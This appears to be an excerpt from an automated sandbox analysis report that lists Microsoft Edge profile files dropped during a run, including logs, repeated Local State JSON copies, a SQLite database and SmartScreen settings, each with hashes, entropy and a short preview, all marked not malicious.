Preview:	2024/11/02-14:51:59.077 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/02-14:51:59.077 e28 Recovering log #3.2024/11/02-14:51:59.078 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.230008842823374
Encrypted:	false
SSDEEP:	6:Hvto+q2PcNwi23oH+TcwtfrzAdIFUt8YvtYZmw+YvHNVkwOcNwi23oH+TcwtfrzS:zvLZYeb9FUt8n/+0z54ZYeb2J
MD5:	BE766EDD0006F8350E445F20F071F55A
SHA1:	839395D51ED5981419F491977762BCEAB741334C
SHA-256:	8BF5152C6F94B99ABBD257778A160BCAEB278FF4B6A705F36F767DDE22588410
SHA-512:	664F1509423D5F4C850DEA9D2F2CDB245B02E1E1EF9FF63D1F9708CF5FC804A05034069E830402031EC2B027AA201DF998C1BA1F66ED25C8E5B923FB5D500545
Malicious:	false
Preview:	2024/11/02-14:51:59.077 e28 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/11/02-14:51:59.077 e28 Recovering log #3.2024/11/02-14:51:59.078 e28 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Browser

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	120
Entropy (8bit):	3.32524464792714
Encrypted:	false
SSDEEP:	3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
MD5:	A397E5983D4A1619E36143B4D804B870
SHA1:	AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
SHA-256:	9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
SHA-512:	4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
Malicious:	false
Preview:	C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Last Version

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	13
Entropy (8bit):	2.7192945256669794
Encrypted:	false
SSDEEP:	3:NYLFRQI:ap2I
MD5:	BF16C04B916ACE92DB941EBB1AF3CB18
SHA1:	FA8DAEAE881F91F61EE0EE21BE5156255429AA8A
SHA-256:	7FC23C9028A316EC0AC25B09B5B0D61A1D21E58DFCF84C2A5F5B529129729098
SHA-512:	F0B7DF5517596B38D57C57B5777E008D6229AB5B1841BBE74602C77EEA2252BF644B8650C7642BD466213F62E15CC7AB5A95B28E26D3907260ED1B96A74B65FB
Malicious:	false
Preview:	117.0.2045.47

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF25f6c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF25ff8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF260d3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF287e3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF2c76d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF371f5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF398f5.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Local State~RF3cd63.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	56066
Entropy (8bit):	6.103040699881289
Encrypted:	false
SSDEEP:	1536:z/Ps+wsI7yn+PGWv/sxtwk7VLyMV/YoskFoz:z/0+zI7ynav/4KOVeZoskG
MD5:	B2E93BED21A580E70DFC88847D06C1CE
SHA1:	89BF64BE6298CE887F62BCCA4164F61136D776B3
SHA-256:	5F3C177DE8A7D254035CB380414A702280CD7B3CFC9F884DE9574BE79DA61686
SHA-512:	5B0989E6D53B291420E2D46C9F86A79820C8BAA15AACE8744C0451EB647B6359107C831AE9788021D1FEDEC6E36018936092FBF59F11A9A3112D8F8F1A3353AF
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.6773696719930975
Encrypted:	false
SSDEEP:	12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
MD5:	6FFCCB198DC6B17E165460E6E246B03C
SHA1:	014A46B0E6E84089E1C20FA232F54CA737D5F023
SHA-256:	D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
SHA-512:	846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	47
Entropy (8bit):	4.3818353308528755
Encrypted:	false
SSDEEP:	3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
MD5:	48324111147DECC23AC222A361873FC5
SHA1:	0DF8B2267ABBDBD11C422D23338262E3131A4223
SHA-256:	D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
SHA-512:	E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
Malicious:	false
Preview:	customSettings_F95BA787499AB4FA9EFFF472CE383A14

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\customSettings_F95BA787499AB4FA9EFFF472CE383A14

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	35
Entropy (8bit):	4.014438730983427
Encrypted:	false
SSDEEP:	3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
MD5:	BB57A76019EADEDC27F04EB2FB1F1841
SHA1:	8B41A1B995D45B7A74A365B6B1F1F21F72F86760
SHA-256:	2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
SHA-512:	A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
Malicious:	false
Preview:	{"forceServiceDetermination":false}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\RemoteData\edgeSettings

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	81
Entropy (8bit):	4.3439888556902035
Encrypted:	false
SSDEEP:	3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
MD5:	177F4D75F4FEE84EF08C507C3476C0D2
SHA1:	08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
SHA-256:	21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
